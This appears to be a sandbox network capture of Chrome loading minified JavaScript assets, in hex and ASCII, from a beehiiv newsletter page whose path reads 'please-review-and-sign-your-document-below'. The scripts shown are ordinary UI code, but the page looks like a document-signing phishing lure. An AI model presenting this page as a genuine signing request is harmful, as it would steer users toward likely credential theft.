                                                                                                                                            2025-01-15 18:14:37 UTC661INData Raw: 28 7b 67 75 69 64 3a 73 2c 73 65 74 43 6f 6f 6b 69 65 3a 72 2c 63 6f 6f 6b 69 65 73 53 65 74 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 5b 74 2c 6e 5d 3d 6a 28 29 2c 6f 3d 4e 28 29 2c 6d 3d 6b 28 29 2c 69 3d 74 2e 67 65 74 28 22 6c 61 73 74 5f 72 65 73 6f 75 72 63 65 5f 67 75 69 64 22 29 7c 7c 73 2c 6c 3d 74 2e 67 65 74 28 22 61 64 6d 69 6e 5f 74 6f 6b 65 6e 22 29 2c 75 3d 74 2e 67 65 74 28 22 6a 77 74 5f 74 6f 6b 65 6e 22 29 2c 63 3d 6f 2e 68 61 73 68 21 3d 3d 22 22 2c 70 3d 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 61 26 26 69 29 69 66 28 72 28 7b 6e 61 6d 65 3a 22 6c 61 73 74 5f 72 65 73 6f 75 72 63 65 5f 67 75 69 64 22 2c 76 61 6c 75 65 3a 69 2c 64 61 79 73 3a 31 7d 29 2c 74 2e 64 65 6c 65 74 65 28 22
                                                                                                                                            Data Ascii: ({guid:s,setCookie:r,cookiesSet:a})=>{const[t,n]=j(),o=N(),m=k(),i=t.get("last_resource_guid")||s,l=t.get("admin_token"),u=t.get("jwt_token"),c=o.hash!=="",p=t.toString();d.useEffect(()=>{if(a&&i)if(r({name:"last_resource_guid",value:i,days:1}),t.delete("


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            91192.168.2.1649816104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC840OUTGET /assets/index-DcpNk-OI.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 531
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"213-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b1ffae8c51-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 61 61 34 62 39 35 38 2d 36 33 30 36 2d 35 38 32 61 2d 61 34 65 65 2d 39 66 61 38 63 66 66 35 66 35 39 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5aa4b958-6306-582a-a4ee-9fa8cff5f593")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC73INData Raw: 3d 69 6e 64 65 78 2d 44 63 70 4e 6b 2d 4f 49 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 35 61 61 34 62 39 35 38 2d 36 33 30 36 2d 35 38 32 61 2d 61 34 65 65 2d 39 66 61 38 63 66 66 35 66 35 39 33 0a
                                                                                                                                            Data Ascii: =index-DcpNk-OI.js.map//# debugId=5aa4b958-6306-582a-a4ee-9fa8cff5f593


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            92192.168.2.1649817104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC554OUTGET /assets/XMarkIcon-BIfmjQfr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC903INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 10731
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"29eb-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b21caf43d6-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC466INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 66 38 36 32 36 33 31 2d 33 32 65 65 2d 35 66 65 66 2d 39 66 33 35 2d 35 61 64 66 33 32 32 39 33 66 66 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cf862631-32ee-5fef-9f35-5adf32293ff4")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6a 73 22 3b 69 6d 70 6f 72 74 7b 79 20 61 73 20 4a 2c 73 20 61 73 20 57 2c 64 20 61 73 20 46 2c 6e 20 61 73 20 59 2c 75 20 61 73 20 5a 7d 66 72 6f 6d 22 2e 2f 74 72 61 6e 73 69 74 69 6f 6e 2d 79 2d 35 58 46 46 75 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 7a 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 74 72 65 65 2d 77 61 6c 6b 65 72 2d 49 6e 76 34 6d 64 73 50 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 68 20 61 73 20 65 65 2c 54 20 61 73 20 74 65 2c 5f 20 61 73 20 72 65 2c 4d 20 61 73 20 51 2c 44 20 61 73 20 47 2c 49 20 61 73 20 6e 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 73 63 72 65 65 6e 58 2c 65 2e 73 63 72 65 65 6e 59
                                                                                                                                            Data Ascii: js";import{y as J,s as W,d as F,n as Y,u as Z}from"./transition-y-5XFFuu.js";import{F as z}from"./use-tree-walker-Inv4mdsP.js";import{h as ee,T as te,_ as re,M as Q,D as G,I as ne}from"./use-is-mounted-BaHv16bB.js";function B(e){return[e.screenX,e.screenY
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3d 28 61 3d 65 2e 69 6e 6e 65 72 54 65 78 74 29 21 3d 6e 75 6c 6c 3f 61 3a 22 22 2c 6f 3d 65 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 3b 69 66 28 21 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 20 6e 3b 6c 65 74 20 74 3d 21 31 3b 66 6f 72 28 6c 65 74 20 75 20 6f 66 20 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 68 69 64 64 65 6e 5d 2c 5b 61 72 69 61 2d 68 69 64 64 65 6e 5d 2c 5b 72 6f 6c 65 3d 22 69 6d 67 22 5d 27 29 29 75 2e 72 65 6d 6f 76 65 28 29 2c 74 3d 21 30 3b 6c 65 74 20 6c 3d 74 3f 28 72 3d 6f 2e 69 6e 6e 65 72 54 65 78 74 29 21 3d 6e 75 6c 6c 3f 72 3a 22 22 3a 6e 3b 72 65 74 75 72 6e 20 4b 2e 74 65 73 74 28 6c 29 26 26 28 6c 3d 6c 2e 72 65 70 6c 61 63 65 28 4b 2c 22 22 29
                                                                                                                                            Data Ascii: =(a=e.innerText)!=null?a:"",o=e.cloneNode(!0);if(!(o instanceof HTMLElement))return n;let t=!1;for(let u of o.querySelectorAll('[hidden],[aria-hidden],[role="img"]'))u.remove(),t=!0;let l=t?(r=o.innerText)!=null?r:"":n;return K.test(l)&&(l=l.replace(K,"")
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 2d 31 26 26 28 6f 3d 6e 75 6c 6c 29 2c 7b 69 74 65 6d 73 3a 6e 2c 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 3a 6f 7d 7d 6c 65 74 20 66 65 3d 7b 31 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 31 3f 65 3a 7b 2e 2e 2e 65 2c 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 3a 6e 75 6c 6c 2c 6d 65 6e 75 53 74 61 74 65 3a 31 7d 7d 2c 30 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 30 3f 65 3a 7b 2e 2e 2e 65 2c 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 21 31 2c 6d 65 6e 75 53 74 61 74 65 3a 30 7d 7d 2c 32 3a 28 65 2c 61 29 3d 3e 7b 76 61 72 20 72 3b 6c 65 74 20 6e 3d 6b 28 65 29 2c 6f 3d 6f 65 28 61 2c 7b 72 65 73 6f 6c 76 65 49 74 65 6d 73 3a 28 29 3d 3e 6e 2e 69 74 65 6d 73
                                                                                                                                            Data Ascii: ;return o===-1&&(o=null),{items:n,activeItemIndex:o}}let fe={1(e){return e.menuState===1?e:{...e,activeItemIndex:null,menuState:1}},0(e){return e.menuState===0?e:{...e,__demoMode:!1,menuState:0}},2:(e,a)=>{var r;let n=k(e),o=oe(a,{resolveItems:()=>n.items
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 29 3b 74 68 72 6f 77 20 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 26 26 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 72 2c 54 29 2c 72 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 65 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 56 28 61 2e 74 79 70 65 2c 66 65 2c 65 2c 61 29 7d 6c 65 74 20 70 65 3d 63 2e 46 72 61 67 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 2c 61 29 7b 6c 65 74 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 72 3d 21 31 2c 2e 2e 2e 6e 7d 3d 65 2c 6f 3d 63 2e 75 73 65 52 65 64 75 63 65 72 28 6d 65 2c 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 72 2c 6d 65 6e 75 53 74 61 74 65 3a 72 3f 30 3a 31 2c 62 75 74 74 6f 6e 52 65 66 3a 63 2e 63 72 65 61 74 65 52 65 66 28 29 2c 69 74 65 6d 73 52
                                                                                                                                            Data Ascii: );throw Error.captureStackTrace&&Error.captureStackTrace(r,T),r}return a}function me(e,a){return V(a.type,fe,e,a)}let pe=c.Fragment;function ve(e,a){let{__demoMode:r=!1,...n}=e,o=c.useReducer(me,{__demoMode:r,menuState:r?0:1,buttonRef:c.createRef(),itemsR
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 66 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 68 2e 66 6f 63 75 73 28 7b 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 3a 21 30 7d 29 7d 29 29 3a 28 64 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 28 7b 74 79 70 65 3a 30 7d 29 29 29 7d 29 2c 78 3d 63 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 28 7b 6f 70 65 6e 3a 6c 2e 6d 65 6e 75 53 74 61 74 65 3d 3d 3d 30 7d 29 2c 5b 6c 5d 29 2c 52 3d 7b 72 65 66 3a 73 2c 69 64 3a 6f 2c 74 79 70 65 3a 58 28 65 2c 6c 2e 62 75 74 74 6f 6e 52 65 66 29 2c 22 61 72 69 61 2d 68 61 73 70 6f 70 75 70 22 3a 22 6d 65 6e 75 22 2c 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 3a 28 72 3d 6c 2e 69 74 65 6d 73 52 65 66 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 72 2e 69 64 2c 22 61
                                                                                                                                            Data Ascii: f.current)==null?void 0:h.focus({preventScroll:!0})})):(d.preventDefault(),u({type:0})))}),x=c.useMemo(()=>({open:l.menuState===0}),[l]),R={ref:s,id:o,type:X(e,l.buttonRef),"aria-haspopup":"menu","aria-controls":(r=l.itemsRef.current)==null?void 0:r.id,"a
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 28 75 2e 62 75 74 74 6f 6e 52 65 66 2e 63 75 72 72 65 6e 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 66 2e 41 72 72 6f 77 44 6f 77 6e 3a 72 65 74 75 72 6e 20 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 73 28 7b 74 79 70 65 3a 32 2c 66 6f 63 75 73 3a 67 2e 4e 65 78 74 7d 29 3b 63 61 73 65 20 66 2e 41 72 72 6f 77 55 70 3a 72 65 74 75 72 6e 20 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 73 28 7b 74 79 70 65 3a 32 2c 66 6f 63 75 73 3a 67 2e 50 72 65 76 69 6f 75 73 7d 29 3b 63 61 73 65 20 66 2e 48 6f 6d 65 3a 63 61 73 65 20 66 2e 50 61 67 65 55 70 3a 72 65 74 75 72 6e 20 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: (u.buttonRef.current);break;case f.ArrowDown:return i.preventDefault(),i.stopPropagation(),s({type:2,focus:g.Next});case f.ArrowUp:return i.preventDefault(),i.stopPropagation(),s({type:2,focus:g.Previous});case f.Home:case f.PageUp:return i.preventDefault
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 49 6e 64 65 78 21 3d 3d 6e 75 6c 6c 3f 6c 2e 69 74 65 6d 73 5b 6c 2e 61 63 74 69 76 65 49 74 65 6d 49 6e 64 65 78 5d 2e 69 64 3d 3d 3d 6e 3a 21 31 2c 70 3d 63 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 79 3d 77 28 61 2c 70 29 3b 24 28 28 29 3d 3e 7b 69 66 28 6c 2e 5f 5f 64 65 6d 6f 4d 6f 64 65 7c 7c 6c 2e 6d 65 6e 75 53 74 61 74 65 21 3d 3d 30 7c 7c 21 73 7c 7c 6c 2e 61 63 74 69 76 61 74 69 6f 6e 54 72 69 67 67 65 72 3d 3d 3d 30 29 72 65 74 75 72 6e 3b 6c 65 74 20 6d 3d 41 28 29 3b 72 65 74 75 72 6e 20 6d 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 29 3d 3e 7b 76 61 72 20 43 2c 5f 3b 28 5f 3d 28 43 3d 70 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 43 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 29 3d 3d
                                                                                                                                            Data Ascii: Index!==null?l.items[l.activeItemIndex].id===n:!1,p=c.useRef(null),y=w(a,p);$(()=>{if(l.__demoMode||l.menuState!==0||!s||l.activationTrigger===0)return;let m=A();return m.requestAnimationFrame(()=>{var C,_;(_=(C=p.current)==null?void 0:C.scrollIntoView)==
                                                                                                                                            2025-01-15 18:14:37 UTC682INData Raw: 72 7d 2c 6e 29 7b 72 65 74 75 72 6e 20 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 61 7d 2c 72 29 2c 65 3f 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 61 7d 2c 65 29 3a 6e 75 6c 6c 2c 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61
                                                                                                                                            Data Ascii: r},n){return c.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":a},r),e?c.createElement("title",{id:a},e):null,c.createElement("pa


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            93192.168.2.1649819104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC850OUTGET /assets/ChevronDownIcon-CCywpT3m.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 902
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"386-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b2ced90c80-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 30 61 39 34 61 64 61 2d 33 61 30 65 2d 35 30 35 66 2d 62 30 64 36 2d 63 33 38 64 64 35 33 64 33 35 34 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="50a94ada-3a0e-505f-b0d6-c38dd53d3543")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC444INData Raw: 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6f 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 61 7d 2c 6c 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 61 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 2e 35 33 20 31 36 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 31 2e 30 36 20 30 6c 2d 37 2e 35 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 31 2e 30 36 2d 31 2e 30 36 4c 31 32 20 31 34 2e 36 39 6c 36 2e 39 37 2d 36 2e 39 37 61 2e 37 35 2e 37 35 20 30 20 31
                                                                                                                                            Data Ascii: or","aria-hidden":"true","data-slot":"icon",ref:o,"aria-labelledby":a},l),r?e.createElement("title",{id:a},r):null,e.createElement("path",{fillRule:"evenodd",d:"M12.53 16.28a.75.75 0 0 1-1.06 0l-7.5-7.5a.75.75 0 0 1 1.06-1.06L12 14.69l6.97-6.97a.75.75 0 1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
